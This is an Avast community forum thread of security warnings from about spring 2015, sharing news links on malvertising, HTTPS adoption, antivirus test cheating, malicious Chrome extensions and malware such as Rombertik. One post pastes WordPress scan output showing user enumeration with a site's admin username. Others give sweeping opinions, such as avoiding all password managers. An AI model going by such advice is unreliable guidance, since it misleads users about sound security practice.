Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840 (https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840)
polonus
I remember when HTTPS Everywhere was all the rage. (It wasn't that long ago either.....)
And I remember I was raging against its use ;D
For a very short time I considered changing my position as avast now scans https content (but not on all OSes), but I'm still of the same position on forcing https. There are some areas where it can help combat 'man in the middle attacks,' but now see there are other compromising issues.
-
Hi bob3160 and DavidR,
Encryption is fine, but when there is malicious code and it comes in in an encrypted way and you can not scan or check this in advance. What then? And what you say, bob3160, what about https sites with plain txt log-ins. I see a lot of these still. A lot of implementation of https everywhere adopted sites is also weak - not to say rather insecure- , and so here we go again. What looks right at a first glance, should not always be so in practice.
Well, do you see the problem there? Moreover these malvertising campaigns, lately through an obscure Bulgarian domain, only lasts a couple of hours, but could make an awful lot of victim. A decent adblocker is a must nowadays.
polonus
-
Hi bob3160 and DavidR,
Encryption is fine, but when there is malicious code and it comes in in an encrypted way and you can not scan or check this in advance. What then? And what you say, bob3160, what about https sites with plain txt log-ins. I see a lot of these still. A lot of implementation of https everywhere adopted sites is also weak - not to say rather insecure- , and so here we go again. What looks right at a first glance, should not always be so in practice.
Well, do you see the problem there? Moreover these malvertising campaigns, lately through an obscure Bulgarian domain, only lasts a couple of hours, but could make an awful lot of victim. A decent adblocker is a must nowadays.
polonus
I like David, always warned against using HTTPS Everywhere. I haven't changed my mind. :)
-
Hi bob3160,
US users come under special malvertisement threat during U.S. federal holidays and three-day weekends,
Malvertisers from other part of the world have calenders up to just pick these days.
Google removes hundreds of million bad ads, but of course always some will slip through.
polonus
-
Please enlighten me, what's wrong with HTTPS Everywhere? ???
-
Hi Para-Noid,
There is enough wrong with a lot of HTTPS Everywhere domains. Wrong server configurations, missing or wrong security header implementations, mixed content site, log-ins with alerts for all log-in info going over the wire in plain txt form.
And a lot of possible other issues making the ideal situation looking good at first sight, but the real worls situation is often worse as could be (poodle, beast and heartbleed, cerificvation errors, encryption served "from the weak side up" (surveillance can be performed without much of a hassle). So a lot of good will going hand in hand with a lot of incompetence and situations where money comes before security. Now you understand that malvertisers are a problem on a normal http website, but when they come encrypten on a https website in the present situation the detection problem can outgrow the added protocol security.
I perform webscans as volunteer website analyst so I know what I am talking about with thousands of examples scanned.
The Browser JSGuard extention in Chrome and SaferChromeSecurity extensions will give you some good insights in the overal https site insecurities that exist,
polonus
-
Tech Support Spam Plague LinkedIn and Other High-Traffic Sites
https://blog.malwarebytes.org/fraud-scam/2015/04/tech-support-spam-plague-linkedin-and-other-high-traffic-sites/?utm_source=Gplus&utm_medium=social
Thanks polonus for a good explanation. I would never question your credentials as a website analyst.
-
See for frauds: http://escrow-fraud.com/search.php?&all=&dir=asc&sf=p&start=2521
pol
-
InfoSec Books to Read for World Book Day
https://blog.malwarebytes.org/cyber-crime/2015/04/infosec-books-to-read-for-world-book-day/?utm_source=Gplus&utm_medium=social
-
An Instagram Roundup
https://blog.malwarebytes.org/online-security/2015/04/an-instagram-roundup/?utm_source=Gplus&utm_medium=social
-
What AV vendors have cheated here - according to this infringement report: http://weblog.av-comparatives.org/?p=501
Reason for the apparent fraud would be the fact that users mainly choose an AV vendor based on AV Comparative Security Test Results,
"which is not very clever according to me, but it is the way for people that rely on third party authority as they cannot decide for themselves because of lack of insight." Between brackets I state what is purely my own personal opinion, pol
polonus
-
I would like to know that too:)
-
I think you are not alone there, and I would like to hear Avast's comments in the aftermath if there were any to come.
Well at least we have to wait after the conclusions have been brought forward of course, they cannot react pending the investigations. But if innocent I would play this out great time, these two infringers should be punished by the market period.
polonus
-
I would also be interested in seeing the results. :(
(http://www.screencast-o-matic.com/screenshots/u/Lh/1430084131813-73957.png)
-
OMG!!! I hope it aint one of the major antivirus program i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
-
OMG!!! I hope it aint one of the major antivirus program i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
-
Speculation is totally out of line. It only starts rumors.
Right you are, bob3160. They should never have presented this in this way
and have mentioned the offending AV vendors when they were ready to do so without delay.
Furthermore it has been reported that there was a party that had sent in pre-prepared results.
polonus
-
OMG!!! I hope it aint one of the major antivirus program i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
I didn't mean as a rumors just assuming it won't be any of the top antivirus that I have listed there. An assumption. Even though I will stick to AVG Free and Avast Free forever. AVG Free (for my desktop) and Avast Free (for my laptop and where I log in and out and write in this forum) and other vendors that I have listed it will also be bad for business as those antivirus software can be bought from retail stores worldwide. Mistakes do happen hope it can be resolved asap.
-
OMG!!! I hope it aint one of the major antivirus program i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
I didn't mean as a rumors just assuming it won't be any of the top antivirus that I have listed there. An assumption. Even though I will stick to AVG Free and Avast Free forever. AVG Free (for my desktop) and Avast Free (for my laptop and where I log in and out and write in this forum) and other vendors that I have listed it will also be bad for business as those antivirus software can be bought from retail stores worldwide. Mistakes do happen hope it can be resolved asap.
Never assume, it usually makes an ass out of you and me. :)
-
Ok. Yes Sir! :)
-
If and when AV-C is ready they will reveal the guilty party.
-
Another reason to have a good ad blocker
https://blog.malwarebytes.org/malvertising-2/2015/04/malvertising-strikes-adult-site-xhamster-again/?utm_source=Gplus&utm_medium=social
-
Thank you, Para-Noid, for the heads-up on this.
And folks remember when you have plug-ins activate as an on demand basiis,
so only when you trust it to run inside the browser.
And remember now you rarely need java, so when not needed uninstall.
polonus
-
Again critical hole in WP CMS: http://klikki.fi/adv/wordpress2.html (disclosed by Jouko Pynnonen )
Sucuri's analysis: http://klikki.fi/adv/wordpress2.html
polonus
-
Yet another reason to have a good ad blocker and MalwareBytes Anti-Exploit
https://blog.malwarebytes.org/privacy-2/2015/04/ads-on-colouring-pages-website-lead-to-installs-explicit-content/?utm_source=Gplus&utm_medium=social
This is getting old in a hurry. The only thing a user can do is to use common sense and be alert and stay up to date with all of the
malicious on-goings on the web. Look before you leap. In other words do some research before you click. It may save you some anguish later.
-
Malware authors go a step further to access bank accounts
https://blog.avast.com/2015/04/27/malware-authors-go-a-step-further-to-access-bank-accounts/
Updated: Kaspersky leaves users open to FREAK attack
On this article you will see this statement: "All the anti-virus applications checked - Avast, Kaspersky and ESET - lower the security of TLS connections in one way or another says Hanno Bock."
http://www.scmagazineuk.com/updated-kaspersky-leaves-users-open-to-freak-attack/article/411470/
Hope Avast read this. Someone please attract my post to the moderators so we can get an answer/clarification about a fix or a solution. Thanks.
-
Hope Avast read this. Someone please attract my post to the moderators so we can get an answer/clarification about a fix or a solution. Thanks.
See: https://forum.avast.com/index.php?topic=170164.0
-
Mac OS X under attack – 10 security packages put to the test
http://www.av-test.org/en/news/news-single-view/mac-os-x-under-attack-10-security-packages-put-to-the-test/
-
Acrobat and Reader support ending for Mac OS X 10.6 and 10.7
http://blogs.adobe.com/documentcloud/acrobat-and-reader-support-ending-for-mac-os-x-10-6-and-10-7/
-
A good reason to take a layered approach in you system security.
https://blog.malwarebytes.org/malvertising-2/2015/04/domain-shadowing-with-a-twist/?utm_source=Gplus&utm_medium=social
-
More iPhone 6 Scams in the Wild
https://blog.malwarebytes.org/fraud-scam/2015/04/more-iphone-6-scams-in-the-wild/?utm_source=Gplus&utm_medium=social
Password Alert for Chrome, and other Extensions
https://blog.malwarebytes.org/privacy-2/2015/04/password-alert-for-chrome-and-other-extensions/?utm_source=Gplus&utm_medium=social
-
Mozilla is phasing out HTTP in favor of HTTPS:
http://news.softpedia.com/news/Mozilla-Is-Phasing-Out-HTTP-Support-a-Legacy-Mode-Will-Be-Available-479895.shtml
and
https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http/
and
https://letsencrypt.org/
Websites will be have "new features" disabled to pressure them into using TLS.
This all became possible because IE will soon join "Clippy" in the M$' Afterlife,
well at least that is what they plan for the future.
Also Google Chrome is planning to support the transition of HTTP through HTTPS.
Also to better thward off ad-blocking, conflicting with their main income scheme.
My personal question is why change unsecurity through another form of unsecurity driven by obscurity and encryption.
Malvertising detection will get harder. Loads and loads of website owners will continue to provide mixed and unsecure content and continue their unsecure misconfiguration of server and CMS (and plug-ins and themes) and endanger users further through outdated software and vulnerabilities.
First see to it that the protocol is configured securely, educate those that are responsible for a website's security and then think of a transition from http to https.
I have scanned many a so-called HTTPS Everywhere adopted website and what I found there did not make me particularly happy.
Scan for yourselves here: http://cyh.herokuapp.com/cyh (online https and http security header scanner)
Also see loads and loads of sites where the log-in info go in plain txt over the wires. :o
Browser developers in the first place should work on the client side,
not decide what should be on the server side, allthough they have a right to alert,
when and where something is going wrong.
Here a little background info and where the quote was taken from:
http://cryto.net/~joepie91/blog/2015/05/01/on-mozillas-forced-ssl/
link article author = Joepie91.
And here a word from some-one that promotes the transition: http://moz.com/blog/seo-tips-https-ssl
link article author = Cyrus Shepard
polonus
-
“We Need Your Support” Nepal Earthquake 419 Spam
https://blog.malwarebytes.org/fraud-scam/2015/05/we-need-your-support-nepal-earthquake-419-spam/?utm_source=Gplus&utm_medium=social
There is always some idiot trying to prey on those with big hearts.
I have an idea on what to do with them...but it's illegal in the USA.
-
Google Password Alert for the second time bypassed: http://arstechnica.com/security/2015/04/30/behold-the-drop-dead-simply-exploit-that-nukes-googles-password-alert/
Advice: Do not use any Password Managers.
polonus
-
Definitely time to leave Chrome for something more secure
-
Hi essexboy,
You might have a point there. I think it is because the browser became more and more popular. Google Chrome wants too much too soon and within a short time. Marketing dictates and security may give out at a certain moment.
Lately I saw someone could circumvent my google + account security and I had to block some strange entity that wanted to be added to my acquaintances.
It is dangerous to use Password Managers now inside Google Chrome and that one user model for all Google services is certainly making the attack surface of the client larger and larger. Their bringing in "https-only" will also benefit malcreants' encryption and circumvention (for malvertisers and other cybercriminals), while not every https website is up to those security standards yet to securily run inside Google Chrome.
Besides the normal user with a simple only txt info website format will become an endangered species and implementation of SSL and certification could be a costly exercise for non-commercial websites, so we will finally land there where they were aiming at that is at a situation where we can only welcome big(ger) commercial websites and we might lose the Interwebs for everyone and all else (bloggers, alternative info sites, etc. etc.). When my prediction will come through, do not say in the aftermath that I did not warn in advance for what is about to materialize.... :D or all will adopt a more secure HTTPS protocol. Then there is still a lot of work to be done. We will see where it leads.
Here the situation on SSL as it presents itself to-day from SSL-Pulse: https://www.trustworthyinternet.org/ssl-pulse/
Over 114.000 site with inadequate security. Only 22.1% was found to be secure!
polonus
-
Definitely time to leave Chrome for something more secure
That is why I choose Firefox because it give me more control and secure than Chrome, and I've heard most people prefer Firefox with a much better option and they always keeps the browser software up to date all the time.
-
Back when firefox was on 3.x I wasnt too fond of it because I found it to be clunky and slow compared to Chrome but since its more recent releases a lot has changed.
-
Definitely time to leave Chrome for something more secure
Agreed.
-
Definitely time to leave Chrome for something more secure
Should avast! now be considering offering Chrome, not just offering it but having it as an opt-out option.
-
Definitely time to leave Chrome for something more secure
Should avast! now be considering offering Chrome, not just offering it but having it as an opt-out option.
+1 Good question.
-
Definitely time to leave Chrome for something more secure
Agreed.
Chrome isn't any less secure than it was before the tool that was cracked ever came into existence.
It was a tool designed to make phishing exploits less likely.
I think someone is jumping the gun ???
-
Unfortunately Chrome has now become very easy to subvert, so far about 60% of the infections that I handle on Chrome necessitate a full uninstall/re-install to cure the problem. As malware is now using the same ID as google store chrome apps. The only way to determine if it is legitimate is to do a file by file scan, however, where the normal number of extensions is about 10 then the files to be looked at are just to much to realistically expect any one to look at. So remove it all and re-install is the quickest option. The problem is increasing and not reducing
-
Well this extension might help: chrome-extension://lkakdehcmmnojcdalpkfgmhphnicaonm/options.html
Extension Defender
Scan your installed extensions for adware, malware, or tracking extensions.
Mine are all genuine and above board - Google should do some cleansing again.
But I agree we see loads of these uninstall-reinstall routines performed by esseboy because of Google Chrome compromittal.
That browser needs hardening. And because of the all Google services integration the browser has become more and more vulnerable. Marketing as a first priority and user security as a last resort issue. :(
polonus
-
Tech Support Scam Source Code Found on GitHub
https://blog.malwarebytes.org/fraud-scam/2015/05/tech-support-scam-source-code-found-on-github/?utm_source=Gplus&utm_medium=social
-
So we are talking about installing unsafe add-ons. The same problem we had not long ago in Firefox.
It's the add ons that are the problem and maybe folks need to be careful what they add to their browser regardless of the browser they use.
-
Unfortunately the fake ones are available in the chrome store, currently helping some one with this problem and having cleaned him up once he downloaded an adblocker from chrome store.... now re-infected
In Chrome settings there is a message at the top:
"Chrome detected that some of your settings were corrupted by another program and reset them to their original defaults. Learn more" and if you click on extensions, get more extensions, the chrome plug in/ app strore still has a mixture of bogus, and I think, genuine plug-ins listed. E.g. BetaFish AdBlocker comes up if you search for ad blocker, and googling that it looks like it is genuine, but above it is a fake adblocker app where the listing is all ungrammatcal, e.g.: "Uses more than 50 million people, free for chrome that blocks all ads and pests is an ad blocker"
-
Hi bob3160,
That is exactly the problem that Google needs to adjust. They need to cleanse shop from junkware that will compromise the Google Chrome Browser settings beyond repair. Junkware remover does a good job of finding this malcode initially, but Google has to keep these criminals out of their install store.
Read here: http://tech.slashdot.org/story/15/04/09/2043226/google-is-too-slow-at-clearing-junkware-from-the-chrome-extension-store
Damian
P.S. Some page capturing extensions were spying on users and I had to change mine for FireShot.
Read: http://betanews.com/2015/04/08/google-is-too-slow-at-clearing-crap-from-the-chrome-extension-store/
Quote: Google is quick to point out that malicious ad injectors are not specific to Chrome -- they can also be found in Firefox and Internet Explorer. The company says: "We don’t ban injectors altogether -- if they want to, people can still choose to install injectors that clearly disclose what they do -- but injectors that sneak ads into a user’s browser would certainly violate our policies".
-
Chrome may not be my default browser but, I do use it. I'm also quite certain that the extensions installed on both chrome and Firefox are equally safe.
It is still the user that needs to be educated and, that has always been the problem with almost all compromises.
-
Hi bob3160,
Browsing "in the nude" as FwF puts this so eloquently, has always been a problem and creates problems as well. Users need to check their browser extensions and plug-ins, their clicks, use some form of in-browser protection, like an adblocker, script blocker, and check on all things they thoughtlessly may install. I am also out on Google Chrome (in sandboxie) but I haven't encountered any problem yet, but there are certain places and clicks I will shun. When I do not know where I am heading, I perform a decent pre-scan and my downloads enter a Metascan online pre-scan first (I will survive the couple of extra secs this costs and I know "my OS and browser will thank me for this").
polonus
-
Hi bob3160,
Browsing "in the nude" as FwF puts this so eloquently, has always been a problem and creates problems as well. Users need to check their browser extensions and plug-ins, their clicks, use some form of in-browser protection, like an adblocker, script blocker, and check on all things they thoughtlessly may install. I am also out on Google Chrome (in sandboxie) but I haven't encountered any problem yet, but there are certain places and clicks I will shun. When I do not know where I am heading, I perform a decent pre-scan and my downloads enter a Metascan online pre-scan first (I will survive the couple of extra secs this costs and I know "my OS and browser will thank me for this").
polonus
I'm quite happy with Avast's check of the programs I download. I'm also careful what I download and where I get these downloads from.
The only reason I'm not using Chrome as the default is because of it's speed. I've found opera and Firefox to be much quicker in their response.
-
Yes, I run Avast in PUP-mode enabled also.
An example to see how some get infested: http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-malicious-browser-extensions-in-chrome-web-store/ link article author by Fernando Mercês (Trend Micro's Senior Threat Researcher)
polonus
-
Is it true that Google Chrome coders cannot code in a secure way anymore?
"Security that is holed is like a sieve, you cannot get it back to solid anymore": https://twitter.com/securifybv/status/594403213882818560
A real cat and mouse game has started, upgraded Google Password Alert extension
for Google Chrome to version 1.6 and already again circumvented.
polonus
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/
polonus
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/
polonus
We already have, as this link was in the forums a couple of days ago.
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/ (http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/)
polonus
As I stated in the other thread, when all else fails, blame the other guy.....
-
@DavidR,
Very good for these forums that was how it was presented in the other thread, always give two sides of a story, so the reader can make up his own mind.
@bob3160,
I see a lot of fingers pointing at each other. ;D
D
-
@DavidR,
Very good for these forums that was how it was presented in the other thread, always give two sides of a story, so the reader can make up his own mind.
It was as the very link that you posted has previously been posted so we have seen their rebuttal, the 3rd party bitdefender engine is disabled by default because they feel it may be too much for older/user systems. But it is fine to enable it in a test version.
When AV Comparatives gave their write up, it mentioned that there were substantial differences between the two versions. To me that sounds much more than the 3rd party engine just being disabled in the user available version.
-
@DavidR,
I wonder if we ever get anywhere near what really went on.
polonus
-
Fiesta EK Wreaks Havoc on Popular Torrent Site
https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/?utm_source=Gplus&utm_medium=social
-
What is wrong with the privacy policy of the AnonymoX Extension for firefox and Google Chrome?
Read about it here: http://www.wilderssecurity.com/threads/anonymox-firefox-extension.308582/
Anyone?
polonus
-
Ive been having a problem with Surveillance.Reset-local-password-pro. This started about a month ago and I cant get rid of it. I thought that is why I bought this program last November?? Help, please! Im a business! :'(
-
Ive been having a problem with Surveillance.Reset-local-password-pro. This started about a month ago and I cant get rid of it. I thought that is why I bought this program last November?? Help, please! Im a business! :'(
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
-
A bug revealed that MS does not want to patch: http://googleprojectzero.blogspot.nl/2015/05/in-console-able.html
Read about the unfixed bug here: https://code.google.com/p/google-security-research/issues/detail?id=213
polonus
-
Rombertik, dangerous password stealing malware that ruins the MBR: http://blogs.cisco.com/security/talos/rombertik
link article was authored by Ben Baker and Alex Chiu.
polonus
-
Computer Science > Cryptography and Security
A New Covert Channel over Cellular Voice Channel in Smartphones
http://arxiv.org/abs/1504.05647 (http://arxiv.org/abs/1504.05647)
PDF: http://arxiv.org/ftp/arxiv/papers/1504/1504.05647.pdf (http://arxiv.org/ftp/arxiv/papers/1504/1504.05647.pdf)
-
Rombertik, dangerous password stealing malware that ruins the MBR: http://blogs.cisco.com/security/talos/rombertik
link article was authored by Ben Baker and Alex Chiu.
polonus
More on this....................
Rombertik malware wipes hard drives to prevent detection
http://www.zdnet.com/article/rombertik-malware-wipes-hard-drives-to-prevent-detection/
Threat Spotlight: Rombertik – Gazing Past the Smoke, Mirrors, and Trapdoors
http://blogs.cisco.com/security/talos/rombertik
-
This Carding Forum is Spamtacular
https://blog.malwarebytes.org/fraud-scam/2015/05/this-carding-forum-is-spamtacular/?utm_source=Gplus&utm_medium=social
-
Adware a big, big problem: http://www.theverge.com/2015/5/6/8557843/google-adware-survey-ad-injectors-security-malware
link article author = By Russell Brandom
polonus
-
Always the same small circle of malvertising ad-injecting abusers.
Quote from Google: A small number of software developers support the vast majority of these injectors who in turn syndicate from the larger ad ecosystem. We have contacted the Chrome Web Store and the advertisers targeted by ad injectors to alert each of the deceptive practices involved.
polonus
-
Another critical update for WordPress: https://wordpress.org/news/2015/04/wordpress-4-2-1/
What are the most prevalent WP security risks as I know them from my third party cold reconnaissance scanning.
WordPress Plugins check against the latest versions. Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.
WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /
For instance: twentyeleven
While plugins get a lot of attention when it comes to security vulnerabilities, themes are another source of security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers theme page for information about security related updates and fixes.
Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
For instance on this website:
User ID 1 : speedrider
User ID 2 : None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.
Only the first two user ID's were tested
Directory Indexing
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. It does not seem to be possible to list the directory contents using this method. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.
Compare to linked sites and linked Javascripts Scan - Quote Info Credits go to WordPress Security Scan.
polonus
-
What’s important about Rombertik?
https://blog.malwarebytes.org/security-threat/2015/05/whats-important-about-rombertik/?utm_source=Gplus&utm_medium=social
-
Look out for PUPs claiming to be GOG Galaxy Client
https://blog.malwarebytes.org/fraud-scam/2015/05/look-out-for-pups-claiming-to-be-gog-galaxy-client/?utm_source=Gplus&utm_medium=social
-
Cisco UCS Central Software Arbitrary Command Execution Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150506-ucsc
-
Passwords from hacked Word Press websites stolen in malware campaign:
http://research.zscaler.com/2015/05/compromised-wordpress-sites-leaking.html
Link site Analysis by - Sameer Patil & Deepen Desai
polonus
-
You just can't trust advertisers anymore!
https://blog.malwarebytes.org/malvertising-2/2015/05/malvertising-strikes-on-dozens-of-top-adult-sites/?utm_source=Gplus&utm_medium=social
-
Hi Para-Noid,
WOT has two reds for this: cs.adxpansion dot com: https://www.mywot.com/en/scorecard/cs.adxpansion.com
several negative WOT user reports as well.
Webutation also flags: https://www.virustotal.com/nl/url/40801dedf9be8615fc82d1429aa2f1a688938f40457cef028d3e472ccdea824b/analysis/
See: http://cookiepedia.co.uk/host/cs.adxpansion.com
See the IP and server mitigation here: http://toolbar.netcraft.com/site_report?url=cs.adxpansion.com
Service = tcpwrapped - TCP Wrapper is a client side software solution for Linux/BSD machines which provides firewall features. It monitors all incoming packets to the machine and if an external node attempts to connect, the software checks to see if the node is authorized based on various criteria you can specify (80/tcp connection)
Hosted: http://www.dnsinspect.com/gammanetworking.com/1431102021
polonus
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
Celine Dion’s Official Site Used as Spam Launchpad
https://blog.malwarebytes.org/fraud-scam/2015/05/celine-dions-official-site-used-as-spam-launchpad/?utm_source=Gplus&utm_medium=social
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
That sample screen posted in the link does have one obvious indication that it's a scam ... PayPal has made the point over and over again that it will never, ever, address you as "Dear valued customer" or other generic greeting, but will instead always address you by your full registered name of record, whether individual or enterprise.
Since surely there are ways for a scammer to get this info, they're either too dumb or too lazy to be bothered. Or maybe they're just gambling that no one ever reads PayPal's (or anyone else's) security warnings.
-
Misspellings and grammatical mistakes also always is a good give-away, things aren't what they should be - so scam.
These folks weren't very attentive at school, while they were contemplating other schemes.
polonus
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
That sample screen posted in the link does have one obvious indication that it's a scam ... PayPal has made the point over and over again that it will never, ever, address you as "Dear valued customer" or other generic greeting, but will instead always address you by your full registered name of record, whether individual or enterprise.
Since surely there are ways for a scammer to get this info, they're either too dumb or too lazy to be bothered. Or maybe they're just gambling that no one ever reads PayPal's (or anyone else's) security warnings.
Most people probably never read the privacy statement or the EULA.
-
Just now I read about this
http://www.theregister.co.uk/2015/05/07/avast_false_positive_snafu/
This was caused by users running older versions of Avast 4,5,6,7, and 8. Good thing that Avast will stop and drop support for older versions of Avast end of this month. They should also drop support for Avast 9 aka 2014 as this same problem may also happen to users who still uses Avast 2014.
-
Just now I read about this
http://www.theregister.co.uk/2015/05/07/avast_false_positive_snafu/
This was caused by users running older versions of Avast 4,5,6,7, and 8. Good thing that Avast will stop and drop support for older versions of Avast end of this month. They should also drop support for Avast 9 aka 2014 as this same problem may also happen to users who still uses Avast 2014.
Clearly you don't understand that avast 2014 and 2015 use the same virus definitions and update method. So by your thinking avast should cease support for avast 2015.
There has to be support for older versions (within reason) as not everyone updates immediately for many different and valid reasons.
-
Oh! Both the Avast 2014 and 2015 uses the Avast 9 server to update VPS and program updates. Didn't know that. I hardly do manual updates but didn't see the server name ?
-
Oh! Both the Avast 2014 and 2015 uses the Avast 9 server to update VPS and program updates. Didn't know that. I hardly do manual updates but didn't see the server name ?
You have to look deeper than that as there isn't just one server used for VPS updates that couldn't cater for the 200+ million avast users
If you try to do a manual download of the full data base you will see there are three distinct VPS databases and there would be a different virus definitions update function to cater for the differing VPS types.
This also isn't really a security warnings & notices, things related to the avast program should go in the associated Avast Free/Pro/Premier sub forum.
-
The end of Superfish?
http://www.ghacks.net/2015/05/10/the-end-of-superfish/
-
Hacked ad-network has spread infested ads - Up to 12,500 users per day may have been affected by this threat...
http://blog.trendmicro.com/trendlabs-security-intelligence/ad-network-compromised-users-victimized-by-nuclear-exploit-kit/
Malvertising becoming more and more of a big problem -
another reason my friends to use a decent adblocker,
not only to block ads but also to block accompanying threats.
polonus
-
Security Updates Coming for Adobe Reader, Acrobat
https://threatpost.com/security-updates-coming-for-adobe-reader-acrobat/112697
http://www.theregister.co.uk/2015/05/08/adobe_reader_patch_pre_alert/
I have the latest version of Adobe Acrobat Reader DC (2015.007.20033)
It also says something about Microsoft. Here's that statement. "In January, the company announced that it was ending its Advanced Notification Service, which was a decade-long service providing customers the week before Patch Tuesday with a summary of the patches expected to be released, including the number of bulletins and affected products".
-
Crypto-ransomware found in the wild in Australia: http://www.symantec.com/connect/blogs/breaking-bad-themed-los-pollos-hermanos-crypto-ransomware-found-wild
polonus
-
Compromised .Gov Redirected to Apple ID Phish
https://blog.malwarebytes.org/fraud-scam/2015/05/compromised-gov-redirected-to-apple-id-phish/?utm_source=Gplus&utm_medium=social
-
Microsoft Security Bulletin Summary for May 2015
https://technet.microsoft.com/en-us/library/security/ms15-may.aspx
-
Jamie Oliver’s website hacked again, drops password stealer
https://blog.malwarebytes.org/exploits-2/2015/05/jamie-olivers-website-hacked-again-drops-password-stealer/?utm_source=Gplus&utm_medium=social
“WinYahoo” PUP Modifies Chrome Secure Preferences
https://blog.malwarebytes.org/intelligence/2015/05/winyahoo-pup-modifies-chrome-secure-preferences/?utm_source=Gplus&utm_medium=social
-
“WinYahoo” PUP Modifies Chrome Secure Preferences
https://blog.malwarebytes.org/intelligence/2015/05/winyahoo-pup-modifies-chrome-secure-preferences/?utm_source=facebook&utm_medium=social
-
‘Macro virus’ are back: threats of the past that will haunt us in the future
http://www.pandasecurity.com/mediacenter/malware/macro-virus-are-back-threats-of-the-past-that-will-haunt-us-in-the-future/
-
How to reduce spam in almost 40%: Follow Canada’s example
http://www.pandasecurity.com/mediacenter/news/how-to-reduce-spam-canadas-example/
-
Hej Pondus,
Would be a gigantic step in the right direction if the USA could copy such anti-spam legislation.
Whenever Canada is able, why the States cannot do this?
polonus
P.S. It has been quite some months since I received my last mail spam message thanks to Avast.
Actually I never get spam mail - I knock on wood now ;D
What is annoying 'though are the spam users that ask to be contacted in Skype and I have to block.
I think Skype security has worsened since Microsoft acquired it. >:(
D
-
Could this coming functionality be abused by malware and for global surveillance purposes?
Re: http://blogs.windows.com/msedgedev/2015/05/13/announcing-media-capture-functionality-in-microsoft-edge/
polonus
-
Hej Pondus,
Would be a gigantic step in the right direction if the USA could copy such anti-spam legislation.
Whenever Canada is able, why the States cannot do this?
polonus
P.S. It has been quite some months since I received my last mail spam message thanks to Avast.
Actually I never get spam mail - I knock on wood now ;D
What is annoying 'though are the spam users that ask to be contacted in Skype and I have to block.
I think Skype security has worsened since Microsoft acquired it. >:(
D
+1
Our government is not that smart.
The only place I get spam email is in my Yahoo account. None in Gmail nor in outlook.com
Microsoft didn't help Skype's image.
-
‘Payload tested’ browser popup via AOL’s ad network causes a scare
https://blog.malwarebytes.org/malvertising-2/2015/05/payload-tested-browser-popup-via-aols-ad-network-causes-a-scare/?utm_source=Gplus&utm_medium=social
-
Recent studies showed that a smartphone or tablet owner has an attention span of 7 seconds,
one second less than a common goldfish:
http://www.independent.co.uk/news/science/our-attention-span-is-now-less-than-that-of-a-goldfish-microsoft-study-finds-10247553.htm
link article author = Christopher Hooton
That is why I have Avast Security on my smartphone, so I need less attention span for malcode. ;D
polonus
-
Polunus, i saw that today on the news too, doesn't surprise me. Everywhere you go people looking at their phone every 30 seconds, people at sporting events spending more time on their phone than watching the game. I'm an old fart, stuff like this just baffles me, whats this world coming to? Seems like people would rather interact with a device than real people.
-
Beware of GTA 5 Mods Containing Malware
https://blog.malwarebytes.org/security-threat/2015/05/beware-of-gta-5-mods-containing-malware/?utm_source=Gplus&utm_medium=social
-
Known as a security risk for quite a long time, still exploitable:, good it is stressed again as a risk:
http://xn--thibaud-dya.fr/robots.txt.html
(link article author = fr. thiébaud).
polonus
-
UK rewrites law secretely for a more convenient outcome: https://privacyinternational.org/?q=node/584
polonus
-
Check your sources! Trojanized open source SSH software used to steal information
http://www.symantec.com/connect/blogs/check-your-sources-trojanized-open-source-ssh-software-used-steal-information (http://www.symantec.com/connect/blogs/check-your-sources-trojanized-open-source-ssh-software-used-steal-information)
-
Bitly Imitation Leads to Malware Download
https://blog.malwarebytes.org/security-threat/2015/05/bitly-imitation-leads-to-malware-download/?utm_source=gplus&utm_medium=social
-
The Logjam Attack
https://weakdh.org
several weaknesses in how Diffie-Hellman key exchange has been deployed
yet another TLS exploit ...
-
More on "The Logjam Attack: What You Need to Know"
https://blog.malwarebytes.org/security-threat/2015/05/the-logjam-attack-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Screech! Grand Theft Auto V malware mods warning
